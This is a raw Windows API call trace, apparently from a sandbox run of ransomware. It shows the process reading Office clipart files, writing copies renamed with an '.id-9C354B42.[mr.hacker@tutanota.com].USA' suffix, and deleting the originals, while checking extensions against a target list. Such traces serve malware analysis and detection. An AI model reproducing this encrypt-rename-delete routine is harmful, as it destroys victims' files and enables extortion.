lstrlenW (lpString=".zip") returned 4 [0270.933] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.933] lstrlenW (lpString=".rar") returned 4 [0270.933] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.933] lstrlenW (lpString=".bz2") returned 4 [0270.933] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.933] lstrlenW (lpString=".7z") returned 3 [0270.933] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.933] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF") returned 63 [0270.933] lstrlenW (lpString=".dbf") returned 4 [0270.933] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF") returned 63 [0270.934] lstrlenW (lpString=".1cd") returned 4 [0270.934] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF") returned 63 [0270.934] lstrlenW (lpString=".jpg") returned 4 [0270.934] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.934] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0270.934] lstrlenW (lpString="EN00320_.WMF") returned 12 [0270.934] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00320_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0270.934] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=736) returned 1 [0270.934] CloseHandle (hObject=0x394) returned 1 [0270.934] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00320_.wmf")) returned 0x20 [0270.934] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00320_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0270.935] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00320_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0270.935] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.935] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.935] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00320_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0270.935] GetLastError () returned 0x0 [0270.935] ReadFile (in: hFile=0x394, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x2e0, lpOverlapped=0x0) returned 1 [0270.939] WriteFile (in: hFile=0x39c, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x2f0, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x2f0, lpOverlapped=0x0) returned 1 [0270.940] ReadFile (in: hFile=0x394, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0270.940] WriteFile (in: hFile=0x39c, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.940] SetEndOfFile (hFile=0x39c) returned 1 [0270.944] CloseHandle (hObject=0x39c) returned 1 [0270.944] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.944] SetEndOfFile (hFile=0x394) returned 1 [0270.951] CloseHandle (hObject=0x394) returned 1 [0270.951] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.046] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00320_.wmf")) returned 1 [0271.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF") returned 63 [0271.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF") returned 63 [0271.047] lstrlenW (lpString=".doc") returned 4 [0271.047] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.047] lstrlenW (lpString=".docx") returned 5 [0271.047] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.047] lstrlenW (lpString=".pdf") returned 4 [0271.047] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.047] lstrlenW (lpString=".xls") returned 4 [0271.047] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.047] lstrlenW (lpString=".xlsx") returned 5 [0271.047] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.047] lstrlenW (lpString=".ppt") returned 4 [0271.047] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF") returned 63 [0271.047] lstrlenW (lpString=".zip") returned 4 [0271.047] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.047] lstrlenW (lpString=".rar") returned 4 [0271.047] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.047] lstrlenW (lpString=".bz2") returned 4 [0271.047] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.047] lstrlenW (lpString=".7z") returned 3 [0271.047] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF") returned 63 [0271.047] lstrlenW (lpString=".dbf") returned 4 [0271.047] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF") returned 63 [0271.048] lstrlenW (lpString=".1cd") returned 4 [0271.048] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF") returned 63 [0271.048] lstrlenW (lpString=".jpg") returned 4 [0271.048] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF") returned 63 [0271.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF") returned 63 [0271.048] lstrlenW (lpString=".doc") returned 4 [0271.048] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.048] lstrlenW (lpString=".docx") returned 5 [0271.048] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.048] lstrlenW (lpString=".pdf") returned 4 [0271.048] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.048] lstrlenW (lpString=".xls") returned 4 [0271.048] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.048] lstrlenW (lpString=".xlsx") returned 5 [0271.048] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.048] lstrlenW (lpString=".ppt") returned 4 [0271.048] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF") returned 63 [0271.048] lstrlenW (lpString=".zip") returned 4 [0271.048] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.048] lstrlenW (lpString=".rar") returned 4 [0271.048] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.048] lstrlenW (lpString=".bz2") returned 4 [0271.048] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.048] lstrlenW (lpString=".7z") returned 3 [0271.049] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF") returned 63 [0271.049] lstrlenW (lpString=".dbf") returned 4 [0271.049] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF") returned 63 [0271.049] lstrlenW (lpString=".1cd") returned 4 [0271.049] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF") returned 63 [0271.049] lstrlenW (lpString=".jpg") returned 4 [0271.049] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.049] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.049] lstrlenW (lpString="FD00086_.WMF") returned 12 [0271.049] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00086_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00086_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0271.049] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=29212) returned 1 [0271.049] CloseHandle (hObject=0x3b0) returned 1 [0271.049] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00086_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00086_.wmf")) returned 0x20 [0271.050] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00086_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00086_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.050] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00086_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00086_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0271.050] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.050] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.050] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00086_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00086_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0271.050] GetLastError () returned 0x0 [0271.050] ReadFile (in: hFile=0x3b0, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x721c, lpOverlapped=0x0) returned 1 [0271.059] WriteFile (in: hFile=0x394, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x7220, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x7220, lpOverlapped=0x0) returned 1 [0271.060] ReadFile (in: hFile=0x3b0, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.060] WriteFile (in: hFile=0x394, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.061] SetEndOfFile (hFile=0x394) returned 1 [0271.063] CloseHandle (hObject=0x394) returned 1 [0271.063] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.063] SetEndOfFile (hFile=0x3b0) returned 1 [0271.065] CloseHandle (hObject=0x3b0) returned 1 [0271.065] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00086_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.080] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00086_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00086_.wmf")) returned 1 [0271.085] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00086_.WMF") returned 63 [0271.085] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00086_.WMF") returned 63 [0271.085] lstrlenW (lpString=".doc") returned 4 [0271.085] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.085] lstrlenW (lpString=".docx") returned 5 [0271.085] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.085] lstrlenW (lpString=".pdf") returned 4 [0271.085] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.085] lstrlenW (lpString=".xls") returned 4 [0271.085] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.086] lstrlenW (lpString=".xlsx") returned 5 [0271.086] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.086] lstrlenW (lpString=".ppt") returned 4 [0271.086] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.086] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00086_.WMF") returned 63 [0271.086] lstrlenW (lpString=".zip") returned 4 [0271.086] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.086] lstrlenW (lpString=".rar") returned 4 [0271.086] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.086] lstrlenW (lpString=".bz2") returned 4 [0271.086] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.086] lstrlenW (lpString=".7z") returned 3 [0271.086] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.086] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00086_.WMF") returned 63 [0271.086] lstrlenW (lpString=".dbf") returned 4 [0271.086] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.086] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00086_.WMF") returned 63 [0271.086] lstrlenW (lpString=".1cd") returned 4 [0271.086] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.086] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00086_.WMF") returned 63 [0271.086] lstrlenW (lpString=".jpg") returned 4 [0271.086] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.086] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00086_.WMF") returned 63 [0271.086] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00086_.WMF") returned 63 [0271.086] lstrlenW (lpString=".doc") returned 4 [0271.086] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.086] lstrlenW (lpString=".docx") returned 5 [0271.086] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.086] lstrlenW (lpString=".pdf") returned 4 [0271.087] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.087] lstrlenW (lpString=".xls") returned 4 [0271.087] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.087] lstrlenW (lpString=".xlsx") returned 5 [0271.087] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.087] lstrlenW (lpString=".ppt") returned 4 [0271.087] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.087] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00086_.WMF") returned 63 [0271.087] lstrlenW (lpString=".zip") returned 4 [0271.087] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.087] lstrlenW (lpString=".rar") returned 4 [0271.087] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.087] lstrlenW (lpString=".bz2") returned 4 [0271.087] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.087] lstrlenW (lpString=".7z") returned 3 [0271.087] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.087] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00086_.WMF") returned 63 [0271.087] lstrlenW (lpString=".dbf") returned 4 [0271.087] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.087] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00086_.WMF") returned 63 [0271.087] lstrlenW (lpString=".1cd") returned 4 [0271.087] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.087] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00086_.WMF") returned 63 [0271.087] lstrlenW (lpString=".jpg") returned 4 [0271.087] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.087] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.088] lstrlenW (lpString="FD00296_.WMF") returned 12 [0271.088] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00296_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00296_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0271.089] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=15856) returned 1 [0271.089] CloseHandle (hObject=0x39c) returned 1 [0271.089] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00296_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00296_.wmf")) returned 0x20 [0271.089] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00296_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00296_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.090] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00296_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00296_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0271.090] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.090] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.090] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00296_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00296_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0271.090] GetLastError () returned 0x0 [0271.090] ReadFile (in: hFile=0x39c, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x3df0, lpOverlapped=0x0) returned 1 [0271.099] WriteFile (in: hFile=0x348, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x3e00, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x3e00, lpOverlapped=0x0) returned 1 [0271.100] ReadFile (in: hFile=0x39c, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.100] WriteFile (in: hFile=0x348, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.100] SetEndOfFile (hFile=0x348) returned 1 [0271.100] CloseHandle (hObject=0x348) returned 1 [0271.100] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.100] SetEndOfFile (hFile=0x39c) returned 1 [0271.102] CloseHandle (hObject=0x39c) returned 1 [0271.102] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00296_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.102] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00296_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00296_.wmf")) returned 1 [0271.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00296_.WMF") returned 63 [0271.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00296_.WMF") returned 63 [0271.102] lstrlenW (lpString=".doc") returned 4 [0271.102] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.102] lstrlenW (lpString=".docx") returned 5 [0271.102] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.102] lstrlenW (lpString=".pdf") returned 4 [0271.103] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.103] lstrlenW (lpString=".xls") returned 4 [0271.103] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.103] lstrlenW (lpString=".xlsx") returned 5 [0271.103] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.103] lstrlenW (lpString=".ppt") returned 4 [0271.103] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00296_.WMF") returned 63 [0271.103] lstrlenW (lpString=".zip") returned 4 [0271.103] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.103] lstrlenW (lpString=".rar") returned 4 [0271.103] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.103] lstrlenW (lpString=".bz2") returned 4 [0271.103] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.103] lstrlenW (lpString=".7z") returned 3 [0271.103] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00296_.WMF") returned 63 [0271.103] lstrlenW (lpString=".dbf") returned 4 [0271.103] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00296_.WMF") returned 63 [0271.103] lstrlenW (lpString=".1cd") returned 4 [0271.103] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00296_.WMF") returned 63 [0271.103] lstrlenW (lpString=".jpg") returned 4 [0271.103] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00296_.WMF") returned 63 [0271.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00296_.WMF") returned 63 [0271.103] lstrlenW (lpString=".doc") returned 4 [0271.104] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.104] lstrlenW (lpString=".docx") returned 5 [0271.104] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.104] lstrlenW (lpString=".pdf") returned 4 [0271.104] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.104] lstrlenW (lpString=".xls") returned 4 [0271.104] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.104] lstrlenW (lpString=".xlsx") returned 5 [0271.104] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.104] lstrlenW (lpString=".ppt") returned 4 [0271.104] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00296_.WMF") returned 63 [0271.104] lstrlenW (lpString=".zip") returned 4 [0271.104] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.104] lstrlenW (lpString=".rar") returned 4 [0271.104] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.104] lstrlenW (lpString=".bz2") returned 4 [0271.104] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.104] lstrlenW (lpString=".7z") returned 3 [0271.104] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00296_.WMF") returned 63 [0271.104] lstrlenW (lpString=".dbf") returned 4 [0271.104] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 